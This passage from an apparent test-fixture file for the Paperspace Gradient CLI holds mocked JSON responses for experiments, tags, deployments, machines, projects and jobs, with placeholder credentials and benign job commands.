"dtCreated": "2019-03-06T13:52:48.106674+00:00", "dtDeleted": None, "dtFinished": "2019-03-06T13:56:29.890444+00:00", "dtModified": "2019-03-06T13:52:48.106674+00:00", "dtProvisioningFinished": "2019-03-06T13:56:24.678388+00:00", "dtProvisioningStarted": "2019-03-06T13:55:32.325678+00:00", "dtStarted": "2019-03-06T13:56:24.678388+00:00", "dtTeardownFinished": "2019-03-06T13:56:30.178571+00:00", "dtTeardownStarted": "2019-03-06T13:56:30.024471+00:00", "experimentError": None, "experimentTemplateHistoryId": 31989, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esbipxwngbmji4", "id": 31987, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 31989, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 1", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/j5cidd1koia24/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr4yxj956" }, "totalItems": 12 } }, { "data": [ { "dtCreated": "2019-03-25T14:35:05.738112+00:00", "dtDeleted": None, "dtFinished": "2019-03-25T14:35:21.314193+00:00", "dtModified": "2019-03-25T14:35:05.738112+00:00", "dtProvisioningFinished": "2019-03-25T14:35:12.777000+00:00", "dtProvisioningStarted": "2019-03-25T14:35:12.777000+00:00", "dtStarted": "2019-03-25T14:35:12.777000+00:00", "dtTeardownFinished": "2019-03-25T14:35:21.314193+00:00", "dtTeardownStarted": "2019-03-25T14:35:21.314193+00:00", "experimentError": None, "experimentTemplateHistoryId": 33353, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "e8lufvr2bh8ld", "id": 33351, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 7, "templateHistory": { "dtCreated": "2019-03-25T14:35:05.738112+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 33353, "params": { "command": "nvidia-smi", "container": "Test-Container", "isPreemptible": False, "machineType": "C2", "projectId": "pr1opq9uz", "workspaceFileName": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-25T14:20:07.758313+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-25T14:20:07.758313+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "Expecting value: line 1 column 1 (char 0)", "experimentTemplateHistoryId": 33352, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "esasysj42i2j2s", "id": 33350, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 7, "templateHistory": { "dtCreated": "2019-03-25T14:20:06.517435+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 33352, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "pr1opq9uz", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:46:32.978544+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:46:50.541797+00:00", "dtModified": "2019-03-15T11:46:32.978544+00:00", "dtProvisioningFinished": "2019-03-15T11:46:45.501290+00:00", "dtProvisioningStarted": "2019-03-15T11:46:41.431717+00:00", "dtStarted": "2019-03-15T11:46:45.501290+00:00", "dtTeardownFinished": "2019-03-15T11:46:50.598748+00:00", "dtTeardownStarted": "2019-03-15T11:46:50.561267+00:00", "experimentError": None, "experimentTemplateHistoryId": 32879, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "estgm33hfbqf5k", "id": 32877, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32879, "params": { "clusterId": "cls28l0qm", "command": "python3 myscript.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 4", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/j8bxv3ni2zc17/myscript.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:46:32.513024+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:46:50.363855+00:00", "dtModified": "2019-03-15T11:46:32.513024+00:00", "dtProvisioningFinished": "2019-03-15T11:46:45.324783+00:00", "dtProvisioningStarted": "2019-03-15T11:46:40.947880+00:00", "dtStarted": "2019-03-15T11:46:45.324783+00:00", "dtTeardownFinished": "2019-03-15T11:46:50.419813+00:00", "dtTeardownStarted": "2019-03-15T11:46:50.383192+00:00", "experimentError": None, "experimentTemplateHistoryId": 32878, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "esbo3pisqq3t68", "id": 32876, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32878, "params": { "clusterId": "cls28l0qm", "command": "python3 myscript.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 3", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/jpk82qnq71w9c/myscript.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:46:16.422317+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:46:30.820071+00:00", "dtModified": "2019-03-15T11:46:16.422317+00:00", "dtProvisioningFinished": "2019-03-15T11:46:25.776927+00:00", "dtProvisioningStarted": "2019-03-15T11:46:21.616491+00:00", "dtStarted": "2019-03-15T11:46:25.776927+00:00", "dtTeardownFinished": "2019-03-15T11:46:30.873777+00:00", "dtTeardownStarted": "2019-03-15T11:46:30.839238+00:00", "experimentError": None, "experimentTemplateHistoryId": 32877, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "eso8s7e014681", "id": 32875, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32877, "params": { "clusterId": "cls28l0qm", "command": "python3 test_remote.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 2", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/jsuqgzne50tlg1/test_remote.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:26:14.607276+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:26:32.872835+00:00", "dtModified": "2019-03-15T11:26:14.607276+00:00", "dtProvisioningFinished": "2019-03-15T11:26:27.823314+00:00", "dtProvisioningStarted": "2019-03-15T11:26:23.367983+00:00", "dtStarted": "2019-03-15T11:26:27.823314+00:00", "dtTeardownFinished": "2019-03-15T11:26:32.930538+00:00", "dtTeardownStarted": "2019-03-15T11:26:32.897522+00:00", "experimentError": None, "experimentTemplateHistoryId": 32876, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "esml2ioetny5o6", "id": 32874, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32876, "params": { "clusterId": "cls28l0qm", "command": "python3 myscript.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 1", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/jsnze3m7s2xlpr/myscript.py.zip" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr1opq9uz" }, "totalItems": 6 } } ], "message": "success", "meta": { "filter": [], "limit": 1000000, "offset": 0, "totalItems": 18 } } LIST_OF_EXPERIMENTS_FILTERED_WITH_TWO_PROJECTS_STDOUT = """+--------+----------------+---------+ | Name | ID | Status | +--------+----------------+---------+ | dsfads | esj8mcpaayh5kx | failed | | dsfads | estun7jhqta8sm | failed | | dsfads | es08mwh7ye6zpm | failed | | None | eshdufkt9ti8mx | stopped | | None | e07h0ym8fewm | stopped | | None | e0fq31vyla039 | stopped | | None | esxz3ihfl9qxs2 | stopped | | job 5 | ecqq0rz0gok9i | stopped | | job 4 | es310784c1o1x6 | stopped | | job 3 | esabwtehoekn6w | stopped | | job 2 | ea1d6t082wq7i | stopped | | job 1 | esbipxwngbmji4 | stopped | | None | e8lufvr2bh8ld | failed | | dsfads | esasysj42i2j2s | failed | | job 4 | estgm33hfbqf5k | stopped | | job 3 | esbo3pisqq3t68 | stopped | | job 2 | eso8s7e014681 | stopped | | job 1 | esml2ioetny5o6 | stopped | +--------+----------------+---------+ """ LIST_OF_EXPERIMENTS_FILTERED_BUT_NONE_FOUND = { "data": [ { "data": [], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr4yxj95" }, "totalItems": 0 } }, { "data": [], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr1opq9u" }, "totalItems": 0 } } ], "message": "success", "meta": { "filter": [], "limit": 1000000, "offset": 0, "totalItems": 0 } } UPDATE_TAGS_RESPONSE = [ { "tagId": 1, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.506Z", "dtDeleted": None, "userId": 1, "id": 1, "entity_id": 3, "tag": { "name": "test0", "dtCreated": "2020-02-01T12:46:58.480Z", "id": 1 } }, { "tagId": 2, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.507Z", "dtDeleted": None, "userId": 1, "id": 2, "entity_id": 3, "tag": { "name": "test2", "dtCreated": "2020-02-01T12:46:58.481Z", "id": 2 } }, { "tagId": 3, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.509Z", "dtDeleted": None, "userId": 1, "id": 3, "entity_id": 3, "tag": { "name": "test1", "dtCreated": "2020-02-01T12:46:58.482Z", "id": 3 } }, { "tagId": 4, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.510Z", "dtDeleted": None, "userId": 1, "id": 4, "entity_id": 3, "tag": { "name": "test3", "dtCreated": "2020-02-01T12:46:58.483Z", "id": 4 } } ] GET_TAGS_RESPONSE = { "some_id": [ { "tagId": 1, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.506Z", "dtDeleted": None, "userId": 1, "id": 1, "entity_id": 3, "tag": { "name": "test0", "dtCreated": "2020-02-01T12:46:58.480Z", "id": 1 } }, { "tagId": 2, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.507Z", "dtDeleted": None, "userId": 1, "id": 2, "entity_id": 3, "tag": { "name": "test2", "dtCreated": "2020-02-01T12:46:58.481Z", "id": 2 } }, { "tagId": 3, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.509Z", "dtDeleted": None, "userId": 1, "id": 3, "entity_id": 3, "tag": { "name": "test1", "dtCreated": "2020-02-01T12:46:58.482Z", "id": 3 } }, { "tagId": 4, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.510Z", "dtDeleted": None, "userId": 1, "id": 4, "entity_id": 3, "tag": { "name": "test3", "dtCreated": "2020-02-01T12:46:58.483Z", "id": 4 } } ] } CREATE_DEPLOYMENT_WITH_BASIC_OPTIONS_RESPONSE = { "deployment": { "id": "sadkfhlskdjh", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "batman.bin.supraman@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://www.latlmes.com/breaking/paperspace-now-has-a-100-bilion-valuation", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "some_oauth_secret", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desanw1jptk7woh:predict", "ports": None, "dtCreated": "2019-04-04T10:27:22.659Z", "dtModified": "2019-04-04T10:27:22.659Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": None, "dtDeleted": None, "isDeleted": False } } LIST_DEPLOYMENTS = { "deploymentList": [ { "id": "dev61ity7lx232", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": "some_tag", "params": None, "code": "some_code", "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": "some_username", "imagePassword": "some_password", "workspaceUrl": "https://www.example.com", "workspaceUsername": "some_username", "workspacePassword": "some_password", "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "some_auth_token", "annotations": {}, "oauthKey": "some_oauth_key", "oauthSecret": "some_oauth_secret", "serviceType": "some_service_type", "apiType": "some_api_type", "endpoint": "https://development-services.paperspace.io/model-serving/dev61ity7lx232:predict", "ports": "5000", "dtCreated": "2019-04-04T10:53:56.665Z", "dtModified": "2019-04-04T10:53:56.729Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:53:56.711Z", "dtDeleted": None, "isDeleted": False, "metricsURL": "aws-testing.paperspace.io", }, { "id": "desanw1jptk7woh", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desanw1jptk7woh:predict", "ports": None, "dtCreated": "2019-04-04T10:27:22.659Z", "dtModified": "2019-04-04T10:27:22.726Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:27:22.710Z", "dtDeleted": None, "isDeleted": False }, { "id": "desfnnrqt1v633v", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desfnnrqt1v633v:predict", "ports": None, "dtCreated": "2019-04-04T10:27:10.180Z", "dtModified": "2019-04-04T10:27:10.248Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:27:10.230Z", "dtDeleted": None, "isDeleted": False }, { "id": "desdyn55d2e02su", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desdyn55d2e02su:predict", "ports": None, "dtCreated": "2019-04-04T10:11:10.204Z", "dtModified": "2019-04-04T10:11:10.281Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:11:10.260Z", "dtDeleted": None, "isDeleted": False }, { "id": "des3tmqa3s627o9", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/des3tmqa3s627o9:predict", "ports": None, "dtCreated": "2019-04-04T09:29:22.277Z", "dtModified": "2019-04-04T09:29:22.345Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T09:29:22.327Z", "dtDeleted": None, "isDeleted": False } ], "total": 5, "displayTotal": 5, "runningTotal": 0 } CREATE_MACHINE_RESPONSE = { "id": "psclbvqpc", "name": "some_machine", "os": None, "ram": None, "cpus": 1, "gpu": None, "storageTotal": None, "storageUsed": None, "usageRate": "Pro hourly", "shutdownTimeoutInHours": 168, "shutdownTimeoutForces": False, "performAutoSnapshot": False, "autoSnapshotFrequency": None, "autoSnapshotSaveCount": None, "dynamicPublicIp": False, "agentType": "WindowsDesktop", "dtCreated": "2019-04-10T14:19:49.852Z", "state": "provisioning", "updatesPending": False, "networkId": None, "privateIpAddress": None, "publicIpAddress": None, "region": None, "userId": "u3z4be26", "teamId": "te6hh34n6", "scriptId": None, "dtLastRun": None } LIST_MACHINES_RESPONSE = [ { "ram": None, "userId": "u3z4be26", "cpus": 1, "teamId": "te6hh34n6", "updatesPending": False, "dynamicPublicIp": False, "storageTotal": None, "shutdownTimeoutForces": False, "id": "psclbvqpc", "shutdownTimeoutInHours": 168, "state": "provisioning", "usageRate": "Pro hourly", "publicIpAddress": None, "gp": None, "privateIpAddress": None, "dtCreated": "2019-04-10T14:19:49.852Z", "dtLastRun": None, "storageUsed": None, "scriptId": None, "autoSnapshotSaveCount": None, "name": "keton2", "agentType": "WindowsDesktop", "performAutoSnapshot": False, "networkId": None, "autoSnapshotFrequency": None, "os": None, "region": None }, { "ram": "536870912", "userId": "u3z4be26", "cpus": 1, "teamId": "te6hh34n6", "updatesPending": False, "dynamicPublicIp": False, "storageTotal": "53687091200", "shutdownTimeoutForces": False, "id": "psbtuwfvt", "shutdownTimeoutInHours": 1, "state": "off", "usageRate": "C1 Hourly", "publicIpAddress": None, "gp": "None", "privateIpAddress": "10.64.14.135", "dtCreated": "2019-04-11T18:10:29.665Z", "dtLastRun": None, "storageUsed": "110080", "scriptId": None, "autoSnapshotSaveCount": 1, "name": "New Machine 1", "agentType": "LinuxHeadless", "performAutoSnapshot": True, "networkId": "nng82wb", "autoSnapshotFrequency": "month", "os": "Ubuntu 18.04.1 LTS; uname: 4.15.0-38-generic; distro: ubuntu; major: 18; minor: 04", "region": "East Coast (NY2)" } ] SHOW_MACHINE_RESPONSE = { "id": "some_id", "name": "New Machine 1", "os": "Ubuntu 18.04.1 LTS; uname: 4.15.0-38-generic; distro: ubuntu; major: 18; minor: 04", "ram": "536870912", "cpus": 1, "gpu": "None", "storageTotal": "53687091200", "storageUsed": "110080", "usageRate": "C1 Hourly", "shutdownTimeoutInHours": 1, "shutdownTimeoutForces": False, "performAutoSnapshot": True, "autoSnapshotFrequency": "month", "autoSnapshotSaveCount": 1, "dynamicPublicIp": False, "agentType": "LinuxHeadless", "dtCreated": "2019-04-11T18:10:29.665Z", "state": "off", "updatesPending": False, "networkId": "nng82wb", "privateIpAddress": "10.64.14.135", "publicIpAddress": None, "region": "East Coast (NY2)", "userId": "u3z4be26", "teamId": "te6hh34n6", "scriptId": None, "dtLastRun": None, "events": [ { "name": "restart", "state": "done", "errorMsg": "", "handle": "042454c4-af4c-489a-8bff-b4d3e9f39f9e", "dtModified": "2019-04-12T12:19:05.801Z", "dtFinished": "2019-04-12T12:19:05.801Z", "dtCreated": "2019-04-12T12:19:03.814Z" }, { "name": "stop", "state": "done", "errorMsg": "", "handle": "07fe20ce-35c4-4949-afbd-103d1afc6797", "dtModified": "2019-04-11T19:11:19.942Z", "dtFinished": "2019-04-11T19:11:19.942Z", "dtCreated": "2019-04-11T19:11:14.205Z" }, { "name": "snapshot-create", "state": "done", "errorMsg": "", "handle": "7fa0ab4f-896d-42ac-a2c5-54f0a94c2310", "dtModified": "2019-04-11T18:14:36.702Z", "dtFinished": "2019-04-11T18:14:36.702Z", "dtCreated": "2019-04-11T18:14:33.216Z" }, { "name": "start", "state": "done", "errorMsg": "", "handle": "c04cccdf-3823-4ef1-b1ab-83b3ccdcfcb7", "dtModified": "2019-04-11T18:11:00.371Z", "dtFinished": "2019-04-11T18:11:00.371Z", "dtCreated": "2019-04-11T18:10:45.468Z" }, { "name": "create", "state": "done", "errorMsg": "", "handle": "34f64d24-1161-42f0-871d-1ed03b10dfc0", "dtModified": "2019-04-11T18:10:45.473Z", "dtFinished": "2019-04-11T18:10:45.473Z", "dtCreated": "2019-04-11T18:10:29.665Z" } ] } SHOW_MACHINE_UTILIZATION_RESPONSE = { "machineId": "some_key", "utilization": { "machineId": "some_key", "secondsUsed": 0, "billingMonth": "2017-09", "hourlyRate": 0, }, "storageUtilization": { "machineId": "some_key", "secondsUsed": 256798.902394, "monthlyRate": "5.00", "billingMonth": "2017-09", }, } LIST_PROJECTS_RESPONSE = { "data": [ { "name": "test_project", "handle": "prq70zy79", "dtCreated": "2019-03-18T13:24:46.666Z", "dtDeleted": None, "lastJobSeqNum": 2, "repoNodeId": None, "repoName": None, "repoUrl": None, "experiments": { "data": [ { "dtCreated": "2019-04-05T15:10:55.692629+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-04-05T15:10:55.692629+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 22159, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "estgcoux8igx32", "id": 22123, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1655, "state": 1, "templateHistory": { "dtCreated": "2019-04-05T15:10:54.923725+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 22159, "params": { "is_preemptible": False, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2", "worker_use_dockerfile": False, "workspaceUrl": "example.com" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "prq70zy79" }, "totalItems": 1 } } }, { "name": "keton", "handle": "prmr22ve0", "dtCreated": "2019-03-25T14:50:43.202Z", "dtDeleted": None, "lastJobSeqNum": 8, "repoNodeId": None, "repoName": None, "repoUrl": None, "experiments": { "data": [ { "dtCreated": "2019-04-02T15:17:03.393886+00:00", "dtDeleted": None, "dtFinished": "2019-04-02T17:02:54.654569+00:00", "dtModified": "2019-04-02T15:17:03.393886+00:00", "dtProvisioningFinished": "2019-04-02T15:17:10.978198+00:00", "dtProvisioningStarted": "2019-04-02T15:17:10.978198+00:00", "dtStarted": "2019-04-02T15:17:10.978198+00:00", "dtTeardownFinished": "2019-04-02T17:02:54.654569+00:00", "dtTeardownStarted": "2019-04-02T17:02:54.654569+00:00", "experimentError": None, "experimentTemplateHistoryId": 22130, "experimentTemplateId": 174, "experimentTypeId": 1, "handle": "ehla1kvbwzaco", "id": 22094, "projectHandle": "prmr22ve0", "projectId": 626, "started_by_user_id": 1655, "state": 5, "templateHistory": { "dtCreated": "2019-04-02T15:17:02.663449+00:00", "dtDeleted": None, "experimentTemplateId": 174, "id": 22130, "params": { "is_preemptible": False, "model_path": "/artifacts", "model_type": "Tensorflow", "name": "Test1", "ports": 5000, "project_handle": "prmr22ve0", "worker_command": "python mnist.py --data_format=channels_last", "worker_container": "tensorflow/tensorflow:1.13.1-py3", "worker_machine_type": "K80", "workspaceUrl": "https://github.com/Paperspace/mnist-sample" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "prmr22ve0" }, "totalItems": 1 } } }, { "name": "paperspace-python", "handle": "przhbct98", "dtCreated": "2019-04-04T15:12:34.229Z", "dtDeleted": None, "lastJobSeqNum": 3, "repoNodeId": None, "repoName": None, "repoUrl": None, "experiments": { "data": [ { "dtCreated": "2019-04-24T10:18:30.523193+00:00", "dtDeleted": None, "dtFinished": "2019-04-24T10:18:43.613748+00:00", "dtModified": "2019-04-24T10:18:30.523193+00:00", "dtProvisioningFinished": "2019-04-24T10:18:35.010792+00:00", "dtProvisioningStarted": "2019-04-24T10:18:35.010792+00:00", "dtStarted": "2019-04-24T10:18:35.010792+00:00", "dtTeardownFinished": "2019-04-24T10:18:43.613748+00:00", "dtTeardownStarted": "2019-04-24T10:18:43.613748+00:00", "experimentError": None, "experimentTemplateHistoryId": 22311, "experimentTemplateId": 186, "experimentTypeId": 1, "handle": "es47og38wzhnuo", "id": 22270, "projectHandle": "przhbct98", "projectId": 649, "started_by_user_id": 1655, "state": 7, "templateHistory": { "dtCreated": "2019-04-24T10:18:30.523193+00:00", "dtDeleted": None, "experimentTemplateId": 186, "id": 22311, "params": { "command": ". test.sh\npython2 hello.py", "container": "paperspace/tensorflow-python", "machineType": "G1", "project": "paperspace-python", "workspaceFileName": "temp.zip" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "przhbct98" }, "totalItems": 1 } } } ], "meta": { "totalItems": 3 } } LIST_JOBS_RESPONSE_JSON = { "jobList": [ { "id": "jsxeeba5qq99yn", "name": "job 1", "state": "Error", "workspaceUrl": "none", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "nvidia-smi", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "K80", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "K80 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": "Error quering for experiment for job: sql: Scan error on column index 4, name \"model_path\": unsupported Scan, storing driver.Value type <nil> into type *string", "dtCreated": "2019-03-25T14:51:16.118Z", "dtModified": "2019-03-25T14:51:16.118Z", "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-03-27T13:53:34.188Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "exitCode": None, "queuePosition": None, "seqNum": 1, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553525480", "fqdn": "jsxeeba5qq99yn.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, 